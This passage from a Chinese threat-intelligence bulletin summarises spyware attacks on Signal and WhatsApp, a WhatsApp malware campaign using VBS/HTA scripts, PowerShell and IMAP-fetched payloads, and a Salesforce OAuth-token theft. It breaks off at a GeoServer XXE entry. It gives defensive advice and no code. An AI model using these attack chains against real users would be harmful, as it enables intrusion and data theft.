leaf="">钓鱼攻击（T1566）、用户执行（T1204）、恶意代码植入（T1204.002）、漏洞利用（T1190）、远程控制（T1219）、数据窃取（T1081）、伪装（T1036）、通信拦截（T1020）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jdygzm0s" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">参考链接：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.theregister.com/2025/11/25/cisa_spyware_gangs/" target="_blank">https://www.theregister.com/2025/11/25/cisa_spyware_gangs/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jdygzmy1" style="font-size: 14px;">近期，美国网络安全与基础设施安全局（CISA）发布预警，攻击者利用商业间谍软件入侵 Signal 和 WhatsApp，攻击过程中，以 Signal 的 “linked devices” 功能为突破点，发送篡改二维码诱使受害者扫描，将控制设备添加至账户以窃听实时消息，还通过恶意 App 伪装（冒充 Signal、TikTok）结合钓鱼攻击获取信任与数据。部分攻击利用 Android 零点击漏洞及特定设备漏洞，通过恶意图片触发漏洞实现隐蔽远程控制。这些多层次攻击展现出高效攻防技术，导致通信隐私泄露、敏感信息被非法获取，威胁相关机构信息安全，可能引发情报泄露风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jdygz14il" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span style="font-size: 14px;" mpa-font-style="mdighkrrvpq"><span leaf="">加强移动设备与通信应用防护，监测防范伪造二维码、恶意 App 及零点击漏洞，及时更新系统补丁，为高价值目标部署严格安全监控与应急响应措施。</span></span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigjhd1sw3"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m9hhd2a7" style="font-size: 32px;" data-mpa-action-id="md8m9hiezfc" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">04</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">伪造“阅后即焚”功能劫持WhatsApp会话并投放木马，实现大规模感染与信息窃取</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jfbe92df"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">钓鱼攻击（T1566）、用户执行（T1204）、脚本执行（T1059）、命令与控制（T1071）、数据窃取（T1081）、持久化（T1098）、伪装（T1036）、恶意软件部署（T1204.002）</span></span></p></li></ul><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p style="text-align: left;"><span mpa-font-style="md8jfbe912l2" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p style="text-align: left;"><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.anquanke.com/post/id/313369" target="_blank">https://www.anquanke.com/post/id/313369</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9u5k" style="font-size: 14px;">2025 年 9 月 24 日起，一场针对特定区域 WhatsApp 用户的恶意软件分发活动持续开展，通过伪造 “阅后即焚” 类诱饵消息实施钓鱼，诱使受害者下载内含恶意 VBS 脚本或 HTA 文件的 ZIP 压缩包。文件执行后启动 PowerShell，通过 IMAP 从攻击者控制的邮箱拉取第二阶段 payload，随后转为 HTTP 通信与远程 C2 服务器建立连接。攻击者借助相关脚本和工具劫持 WhatsApp Web 会话，窃取会话 cookie 及联系人列表，并大规模扩散恶意压缩包。后续攻击升级，通过 MSI 安装程序写入文件、创建注册表启动项实现持久化，运行伪装成.log 文件的恶意脚本，由另一 C2 服务器远程控制。此次攻击已感染超 250 台设备，导致用户账户安全受胁、个人信息可能泄露，还可能引发大规模垃圾邮件传播。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jfbe9191w" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigjhckvru" style="font-size: 14px;">警惕钓鱼消息与恶意压缩包，及时更新软件，加强 HTTP C2 流量监控，隔离可疑活动以应对相关威胁。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdigs0671rar"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(0, 0, 0);line-height: 22px;text-align: left;" data-mid=""><span leaf="" mpa-font-style="md8m9c40qpa" style="font-size: 32px;" data-mpa-action-id="md8m9c51feg" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">05</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="font-weight: bold;">基于供应链攻击窃OAuth令牌，非法访Salesforce、泄露信息还威胁加密</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span style="font-weight: bold;font-size: 14px;" mpa-font-style="md8jgv1e12ce"><span leaf="">攻击方式关键词：</span></span></p><p><span style="background-color: transparent;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf="">供应链攻击（T1195）、漏洞利用（T1190）、有效账户滥用（T1078）、数据窃取（T1081）、勒索软件攻击（T1486）、内部人员招募（T1584）、凭证滥用（T1550）、信息泄露（T1071.001）</span></span></p></li><li><p><span mpa-font-style="md8jgv1e17rl" style="font-size: 14px;"><span leaf=""><span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">情报来源：</span></span></span></p><p><span style="background-color: transparent;color: rgb(0, 82, 255);font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 14px;letter-spacing: 0.034em;"><span leaf=""><a href="https://www.hendryadrian.com/the-golden-scale-tis-the-season-for-unwanted-gifts/" target="_blank">https://www.hendryadrian.com/the-golden-scale-tis-the-season-for-unwanted-gifts/</a></span></span></p></li></ul><p style="margin-top: 24px;text-indent: 2em;text-align: left;"><span leaf="" mpa-font-style="md8jgv1ev8f" style="font-size: 14px;">2025 年 11 月中旬，Scattered LAPSUS$ Hunters 重新活跃，通过 Telegram 频道宣布针对 Salesforce 相关数据的盗取行动。攻击者利用 Gainsight 应用漏洞，提取滥用 OAuth 令牌，借助 Salesloft Drift 供应链攻击获取窃取的秘密，非法访问 285 个 Salesforce 实例。他们在 Telegram 及专用泄露网站发布内部系统截图与泄露预告，展示 ShinySp1d3r 勒索软件开发成果，还公开招募内部人员扩大攻击范围。受影响供应商需撤销访问、刷新令牌并轮换 S3 密钥，安全研究机构已发布相关 IoC 及分析报告。此次攻击结合供应链漏洞利用、有效账户滥用等技术，对云服务及相关平台数据安全构成严重威胁，可能导致敏感数据大规模泄露，引发业务中断、经济损失与声誉风险。</span></p><p style="margin-top: 16px;text-align: left;"><span leaf="" mpa-font-style="md8jgv1e1i81" style="font-size: 14px;"><span textstyle="" style="font-weight: bold;">防护建议：</span></span></p><p style="margin-top: 0px;text-align: left;"><span leaf="" mpa-font-style="mdigs05r1tnb" style="font-size: 14px;">受影响企业立即轮换相关令牌与密钥，加强第三方应用访问监控，强化内部培训与供应链风险排查，提升防御能力。</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="md8hmvkqws0"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><div style="margin-bottom: 9px;display: flex;justify-content: flex-start;align-items: center;flex-direction: column;" data-mid="" mpa-from-tpl="t"><p style="margin: 0 5px 0 9px;" data-mid="" mpa-from-tpl="t"><h1 style="font-size: 26px;font-family: PingFangSC-Semibold, &#34;PingFang SC&#34;;font-weight: bold;color: rgb(34, 44, 255);line-height: 31px;letter-spacing: 4px;-webkit-text-stroke: 2px rgb(34, 44, 255);text-align: left;" data-mid=""><span leaf="">03</span></h1></p></div><div data-mid="" mpa-from-tpl="t"><div data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #222CFF;line-height: 22px;letter-spacing: 1px;" data-mid=""><span leaf="" mpa-font-style="md8incu1uzj" style="font-size: 20px;" data-mpa-action-id="md8incuv1bwi" data-pm-slice="0 0 []">重点漏洞情报</span></p></div></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" data-mpa-category="模板" mpa-from-tpl="t"><div data-mpa-template-rows="0" style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 3 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="mdiitmih1vcz"><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="body" mpa-from-tpl="t" data-mpa-action-id="md8i1sec1411"><div data-mpa-template="t" mpa-from-tpl="t" style="padding-left: 4px;padding-right: 4px;" data-mpa-action-id="md8ic5yk1nke" data-pm-slice="0 0 []"><div style="width: 100%;padding-left: 0px;padding-right: 0px;" data-mid="" mpa-from-tpl="t" data-pm-slice="5 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;body&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;md8i1sec1411&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;style&#34;:&#34;padding-left: 4px; padding-right: 4px;&#34;,&#34;data-mpa-action-id&#34;:&#34;md8ic5yk1nke&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;,&#34;class&#34;:&#34;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;data-mpa-category&#34;:&#34;模板&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template-rows&#34;:&#34;0&#34;,&#34;style&#34;:&#34;width: 100%; padding-left: 0px; padding-right: 0px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]" data-mpa-action-id="md8j98r2g8u"><div style="display: flex;justify-content: center;align-items: center;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: flex-start;align-items: center;flex-direction: column;width: 100%;" data-mid="" mpa-from-tpl="t"><div style="align-self: flex-start;padding: 5px 13px;background: white;z-index: 1;display: flex;justify-content: center;align-items: center;margin-left: 25px;margin-bottom: -17.1px;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;margin-right: 5px;margin-top: 5px;" data-mid="" mpa-from-tpl="t"><p style="font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #000000;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8m951ldxp" style="font-size: 32px;" data-mpa-action-id="md8m952lbd3" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 128, 255);">01</span></span></p></div><p style="width: 81px;height: 4px;align-self: flex-start;" data-mid="" mpa-from-tpl="t" nodeleaf=""><img style="background-color: transparent;" class="rich_pages wxw-img" data-ratio="0.04938271604938271" data-w="162" src="https://wechat2rss.xlab.app/img-proxy/?k=bd4171e4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FmflphQBJic3STjs5EXib7E8mUTyW8OOibkBv0A2RCNVdryhNX6icoDx1nzX2h4hcMVPMctYfUcqLiaquTwUnRqlJSbg%2F640"/></p></div><div style="width: 100%;padding: 21px 17px;border: 4px solid #517FED;" data-mid="" mpa-from-tpl="t"><div style="text-align: left;" data-mid="" mpa-from-tpl="t"><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">GeoServer XML 外部实体注入(XXE)漏洞</span></span></p><p style="font-size: 15px;font-family: PingFangSC-Regular, PingFang SC;color: #333333;line-height: 22px;" data-mid=""><span leaf="" mpa-font-style="md8lxf0pxss" style="font-size: 18px;" data-mpa-action-id="md8lxf1q1sip" data-pm-slice="0 0 []"><span textstyle="" style="color: rgb(0, 0, 0);font-weight: bold;">（CVE-2025-58360）</span></span></p></div></div></div></div></div></div></div><ul style="list-style-type: circle;" class="list-paddingleft-1"><li><p><span mpa-font-style="md8jp80j1nod" style="font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica 